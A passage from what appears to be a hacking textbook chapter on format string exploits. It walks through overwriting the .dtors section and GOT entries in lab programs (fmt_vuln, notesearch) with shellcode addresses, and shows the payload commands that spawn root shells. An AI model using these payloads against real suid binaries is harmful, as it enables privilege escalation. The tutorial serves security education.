(gdb) p 0xbfff - 8 $1 = 49143 (gdb) p 0xfd72 - 0xbfff $2 = 15731 (gdb) quit reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08") %49143x%4\ $hn%15731x%5\$hn The right way to print user-controlled input: ????%49143x%4$hn%15731x%5$hn The wrong way to print user-controlled input: ???? b7fe75fc [*] test_val @ 0x08049794 = -1073742478 0xbffffd72 reader@hacking:~/booksrc $
The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.
In binary programs compiled with the GNU C compiler, special table sections called .dtors
and .ctors
are made for destructors and constructors, respectively. Constructor functions are executed before the main()
function is executed, and destructor functions are executed just before the main()
function exits with an exit system call. The destructor functions and the .dtors
table section are of particular interest.
A function can be declared as a destructor function by defining the destructor attribute, as seen in dtors_sample.c.
#include <stdio.h> #include <stdlib.h> static void cleanup(void) __attribute__ ((destructor)); main() { printf("Some actions happen in the main() function..\n"); printf("and then when main() exits, the destructor is called..\n"); exit(0); } void cleanup(void) { printf("In the cleanup function now..\n"); }
In the preceding code sample, the cleanup()
function is defined with the destructor attribute, so the function is automatically called when the main()
function exits, as shown next.
reader@hacking:~/booksrc $ gcc -o dtors_sample dtors_sample.c reader@hacking:~/booksrc $ ./dtors_sample Some actions happen in the main() function.. and then when main() exits, the destructor is called.. In the cleanup() function now.. reader@hacking:~/booksrc $
This behavior of automatically executing a function on exit is controlled by the .dtors
table section of the binary. This section is an array of 32-bit addresses terminated by a NULL address. The array always begins with 0xffffffff
and ends with the NULL address of 0x00000000
. Between these two are the addresses of all the functions that have been declared with the destructor attribute.
The nm
command can be used to find the address of the cleanup()
function, and objdump
can be used to examine the sections of the binary.
reader@hacking:~/booksrc $ nm ./dtors_sample 080495bc d _DYNAMIC 08049688 d _GLOBAL_OFFSET_TABLE_ 080484e4 R _IO_stdin_used w _Jv_RegisterClasses 080495a8 d __CTOR_END__ 080495a4 d __CTOR_LIST__080495b4 d __DTOR_END__
080495ac d __DTOR_LIST__ 080485a0 r __FRAME_END__ 080495b8 d __JCR_END__ 080495b8 d __JCR_LIST__ 080496b0 A __bss_start 080496a4 D __data_start 08048480 t __do_global_ctors_aux 08048340 t __do_global_dtors_aux 080496a8 D __dso_handle w __gmon_start__ 08048479 T __i686.get_pc_thunk.bx 080495a4 d __init_array_end 080495a4 d __init_array_start 08048400 T __libc_csu_fini 08048410 T __libc_csu_init U __libc_start_main@@GLIBC_2.0 080496b0 A _edata 080496b4 A _end 080484b0 T _fini 080484e0 R _fp_hw 0804827c T _init 080482f0 T _start 08048314 t call_gmon_start
080483e8 t cleanup
080496b0 b completed.1 080496a4 W data_start U exit@@GLIBC_2.0 08048380 t frame_dummy 080483b4 T main 080496ac d p.0 U printf@@GLIBC_2.0 reader@hacking:~/booksrc $
The nm
command shows that the cleanup()
function is located at 0x080483e8
(shown in bold above). It also reveals that the .dtors
section starts at 0x080495ac
with __DTOR_LIST__
and ends at
0x080495b4
with __DTOR_END__
( ). This means that
0x080495ac
should contain 0xffffffff, 0x080495b4
should contain 0x00000000
, and the address between them (0x080495b0
) should contain the address of the cleanup()
function (0x080483e8
).
The objdump
command shows the actual contents of the .dtors
section (shown in bold below), although in a slightly confusing format. The first value of 80495ac
is simply showing the address where the .dtors
section is located. Then the actual bytes are shown, opposed to DWORDs, which means the bytes are reversed. Bearing this in mind, everything appears to be correct.
reader@hacking:~/booksrc $ objdump -s -j .dtors ./dtors_sample
./dtors_sample: file format elf32-i386
Contents of section .dtors:
80495ac ffffffff e8830408 00000000
............
reader@hacking:~/booksrc $
An interesting detail about the .dtors
section is that it is writable. An object dump of the headers will verify this by showing that the .dtors
section isn't labeled READONLY
.
reader@hacking:~/booksrc $ objdump -h ./dtors_sample ./dtors_sample: file format elf32-i386 Sections: Idx Name Size VMA LMA File off Algn 0 .interp 00000013 08048114 08048114 00000114 2**0 CONTENTS, ALLOC, LOAD, READONLY, DATA 1 .note.ABI-tag 00000020 08048128 08048128 00000128 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 2 .hash 0000002c 08048148 08048148 00000148 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 3 .dynsym 00000060 08048174 08048174 00000174 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 4 .dynstr 00000051 080481d4 080481d4 000001d4 2**0 CONTENTS, ALLOC, LOAD, READONLY, DATA 5 .gnu.version 0000000c 08048226 08048226 00000226 2**1 CONTENTS, ALLOC, LOAD, READONLY, DATA 6 .gnu.version_r 00000020 08048234 08048234 00000234 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 7 .rel.dyn 00000008 08048254 08048254 00000254 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 8 .rel.plt 00000020 0804825c 0804825c 0000025c 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 9 .init 00000017 0804827c 0804827c 0000027c 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 10 .plt 00000050 08048294 08048294 00000294 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 11 .text 000001c0 080482f0 080482f0 000002f0 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 12 .fini 0000001c 080484b0 080484b0 000004b0 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE 13 .rodata 000000bf 080484e0 080484e0 000004e0 2**5 CONTENTS, ALLOC, LOAD, READONLY, DATA 14 .eh_frame 00000004 080485a0 080485a0 000005a0 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 15 .ctors 00000008 080495a4 080495a4 000005a4 2**2 CONTENTS, ALLOC, LOAD, DATA 16 .dtors 0000000c 080495ac 080495ac 000005ac 2**2 CONTENTS, ALLOC, LOAD, DATA 17 .jcr 00000004 080495b8 080495b8 000005b8 2**2 CONTENTS, ALLOC, LOAD, DATA 18 .dynamic 000000c8 080495bc 080495bc 000005bc 2**2 CONTENTS, ALLOC, LOAD, DATA 19 .got 00000004 08049684 08049684 00000684 2**2 CONTENTS, ALLOC, LOAD, DATA 20 .got.plt 0000001c 08049688 08049688 00000688 2**2 CONTENTS, ALLOC, LOAD, DATA 21 .data 0000000c 080496a4 080496a4 000006a4 2**2 CONTENTS, ALLOC, LOAD, DATA 22 .bss 00000004 080496b0 080496b0 000006b0 2**2 ALLOC 23 .comment 0000012f 00000000 00000000 000006b0 2**0 CONTENTS, READONLY 24 .debug_aranges 00000058 00000000 00000000 000007e0 2**3 CONTENTS, READONLY, DEBUGGING 25 .debug_pubnames 00000025 00000000 00000000 00000838 2**0 CONTENTS, READONLY, DEBUGGING 26 .debug_info 000001ad 00000000 00000000 0000085d 2**0 CONTENTS, READONLY, DEBUGGING 27 .debug_abbrev 00000066 00000000 00000000 00000a0a 2**0 CONTENTS, READONLY, DEBUGGING 28 .debug_line 0000013d 00000000 00000000 00000a70 2**0 CONTENTS, READONLY, DEBUGGING 29 .debug_str 000000bb 00000000 00000000 00000bad 2**0 CONTENTS, READONLY, DEBUGGING 30 .debug_ranges 00000048 00000000 00000000 00000c68 2**3 CONTENTS, READONLY, DEBUGGING reader@hacking:~/booksrc $
Another interesting detail about the .dtors
section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format string program, fmt_vuln.c, must have a .dtors
section containing nothing. This can be inspected using nm
and objdump
.
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR 08049694 d __DTOR_END__ 08049690 d __DTOR_LIST__ reader@hacking:~/booksrc $ objdump -s -j .dtors ./fmt_vuln ./fmt_vuln: file format elf32-i386 Contents of section .dtors: 8049690 ffffffff 00000000 ........ reader@hacking:~/booksrc $
As this output shows, the distance between __DTOR_LIST__
and __DTOR_END__
is only four bytes this time, which means there are no addresses between them. The object dump verifies this.
Since the .dtors
section is writable, if the address after the 0xffffffff
is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. This will be the address of __DTOR_LIST__
plus four, which is 0x08049694
(which also happens to be the address of __DTOR_END__
in this case).
If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin) reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln SHELLCODE will be at 0xbffff9ec reader@hacking:~/booksrc $
Shellcode can be put into an environment variable, and the address can be predicted as usual. Since the program name lengths of the helper program getenvaddr.c and the vulnerable fmt_vuln.c program differ by two bytes, the shellcode will be located at 0xbffff9ec
when fmt_vuln.c is executed. This address simply has to be written into the .dtors
section at 0x08049694
(shown in bold below) using the format string vulnerability. In the output below the short write method is used.
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
08049694
d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\
x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root
sh-3.2#
Even though the .dtors
section isn't properly terminated with a NULL address of 0x00000000
, the shellcode address is still considered to be a destructor function. When the program exits, the shellcode will be called, spawning a root shell.
In addition to the buffer overflow vulnerability, the notesearch program from Chapter 0x200 also suffers from a format string vulnerability. This vulnerability is shown in bold in the code listing below.
int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0; // return 0.
read(fd, note_buffer, note_length); // Read note data.
note_buffer[note_length] = 0; // Terminate the string.
if(search_note(note_buffer, searchstring)) // If searchstring found,
printf(note_buffer);
// print the note.
return 1;
}
This function reads the note_buffer
from the file and prints the contents of the note without supplying its own format string. While this buffer can't be directly controlled from the command line, the vulnerability can be exploited by sending exactly the right data to the file using the notetaker program and then opening that note using the notesearch program. In the following output, the notetaker program is used to create notes to probe memory in the notesearch program. This tells us that the eighth function parameter is at the beginning of the buffer.
reader@hacking:~/booksrc $ ./notetaker AAAA$(perl -e 'print "%x."x10') [DEBUG] buffer @ 0x804a008: 'AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.' [DEBUG] datafile @ 0x804a070: '/var/notes' [DEBUG] file descriptor is 3 Note has been saved. reader@hacking:~/booksrc $ ./notesearch AAAA [DEBUG] found a 34 byte note for user id 999 [DEBUG] found a 41 byte note for user id 999 [DEBUG] found a 5 byte note for user id 999 [DEBUG] found a 35 byte note for user id 999 AAAAbffff750.23.20435455.37303032.0.0.1.41414141.252e7825.78252e78 . -------[ end of note data ]------- reader@hacking:~/booksrc $ ./notetaker BBBB%8\$x [DEBUG] buffer @ 0x804a008: 'BBBB%8$x' [DEBUG] datafile @ 0x804a070: '/var/notes' [DEBUG] file descriptor is 3 Note has been saved. reader@hacking:~/booksrc $ ./notesearch BBBB [DEBUG] found a 34 byte note for user id 999 [DEBUG] found a 41 byte note for user id 999 [DEBUG] found a 5 byte note for user id 999 [DEBUG] found a 35 byte note for user id 999 [DEBUG] found a 9 byte note for user id 999 BBBB42424242 -------[ end of note data ]------- reader@hacking:~/booksrc $
Now that the relative layout of memory is known, exploitation is just a matter of overwriting the .dtors
section with the address of injected shellcode.
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin) reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch SHELLCODE will be at 0xbffff9e8 reader@hacking:~/booksrc $ gdb -q (gdb) p 0xbfff - 8 $1 = 49143 (gdb) p 0xf9e8 - 0xbfff $2 = 14825 (gdb) quit reader@hacking:~/booksrc $ nm ./notesearch | grep DTOR 08049c60 d __DTOR_END__ 08049c5c d __DTOR_LIST__ reader@hacking:~/booksrc $ ./notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\ x08")%49143x%8\$hn%14825x%9\$hn [DEBUG] buffer @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn' [DEBUG] datafile @ 0x804a070: '/var/notes' [DEBUG] file descriptor is 3 Note has been saved. reader@hacking:~/booksrc $ ./notesearch 49143x [DEBUG] found a 34 byte note for user id 999 [DEBUG] found a 41 byte note for user id 999 [DEBUG] found a 5 byte note for user id 999 [DEBUG] found a 35 byte note for user id 999 [DEBUG] found a 9 byte note for user id 999 [DEBUG] found a 33 byte note for user id 999 21 -------[ end of note data ]------- sh-3.2# whoami root sh-3.2#
Since a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose—the procedure linkage table (PLT).
This section consists of many jump instructions, each one corresponding to the address of a function. It works like a springboard—each time a shared function needs to be called, control will pass through the PLT.
An object dump disassembling the PLT section in the vulnerable format string program (fmt_vuln.c) shows these jump instructions:
reader@hacking:~/booksrc $ objdump -d -j .plt ./fmt_vuln ./fmt_vuln: file format elf32-i386 Disassembly of section .plt: 080482b8 <__gmon_start__@plt-0x10>: 80482b8: ff 35 6c 97 04 08 pushl 0x804976c 80482be: ff 25 70 97 04 08 jmp *0x8049770 80482c4: 00 00 add %al,(%eax) ... 080482c8 <__gmon_start__@plt>: 80482c8: ff 25 74 97 04 08 jmp *0x8049774 80482ce: 68 00 00 00 00 push $0x0 80482d3: e9 e0 ff ff ff jmp 80482b8 <_init+0x18> 080482d8 <__libc_start_main@plt>: 80482d8: ff 25 78 97 04 08 jmp *0x8049778 80482de: 68 08 00 00 00 push $0x8 80482e3: e9 d0 ff ff ff jmp 80482b8 <_init+0x18> 080482e8 <strcpy@plt>: 80482e8: ff 25 7c 97 04 08 jmp *0x804977c 80482ee: 68 10 00 00 00 push $0x10 80482f3: e9 c0 ff ff ff jmp 80482b8 <_init+0x18> 080482f8 <printf@plt>: 80482f8: ff 25 80 97 04 08 jmp *0x8049780 80482fe: 68 18 00 00 00 push $0x18 8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18> 08048308 <exit@plt>: 8048308: ff 25 84 97 04 08 jmp *0x8049784 804830e: 68 20 00 00 00 push $0x20 8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18> reader@hacking:~/booksrc $
One of these jump instructions is associated with the exit()
function, which is called at the end of the program. If the jump instruction used for the exit()
function can be manipulated to direct the execution flow into shellcode instead of the exit()
function, a root shell will be spawned. Below, the procedure linking table is shown to be read only.
reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ " 10 .plt 00000060 080482b8 080482b8 000002b8 2**2 CONTENTS, ALLOC, LOAD, READONLY, CODE
But closer examination of the jump instructions (shown in bold below) reveals that they aren't jumping to addresses but to pointers to addresses. For example, the actual address of the printf()
function is stored as a pointer at the memory address 0x08049780
, and the exit()
function's address is stored at 0x08049784
.
080482f8 <printf@plt>: 80482f8: ff 25 80 97 04 08 jmp*0x8049780
80482fe: 68 18 00 00 00 push $0x18 8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18> 08048308 <exit@plt>: 8048308: ff 25 84 97 04 08 jmp*0x8049784
804830e: 68 20 00 00 00 push $0x20 8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
These addresses exist in another section, called the global offset table (GOT), which is writable. These addresses can be directly obtained by displaying the dynamic relocation entries for the binary by using objdump
.
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln
./fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit
reader@hacking:~/booksrc $
This reveals that the address of the exit()
function (shown in bold above) is located in the GOT at 0x08049784
. If the address of the shellcode is overwritten at this location, the program should call the shellcode when it thinks it's calling the exit()
function.
As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before, meaning that the only things that need adjustment are the first 16 bytes of the format string. The calculations for the %x
format parameters will be done once again for clarity. In the output below, the address of the shellcode () is written into the address of the
exit()
function ().
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin) reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln SHELLCODE will be at0xbffff9ec reader@hacking:~/booksrc $ gdb -q (gdb) p 0xbfff - 8 $1 = 49143 (gdb) p 0xf9ec - 0xbfff $2 = 14829 (gdb) quit reader@hacking:~/booksrc $ objdump -R ./fmt_vuln ./fmt_vuln: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049764 R_386_GLOB_DAT __gmon_start__ 08049774 R_386_JUMP_SLOT __gmon_start__ 08049778 R_386_JUMP_SLOT __libc_start_main 0804977c R_386_JUMP_SLOT strcpy 08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\ x08")%49143x%4\$hn%14829x%5\$hn The right way to print user-controlled input: ????%49143x%4$hn%14829x%5$hn The wrong way to print user-controlled input: ???? b7fe75fc [*] test_val @ 0x08049794 = -72 0xffffffb8 sh-3.2# whoami root sh-3.2#
When fmt_vuln.c tries to call the exit()
function, the address of the exit()
function is looked up in the GOT and is jumped to via the PLT. Since the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.
Another advantage of overwriting the GOT is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.
The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.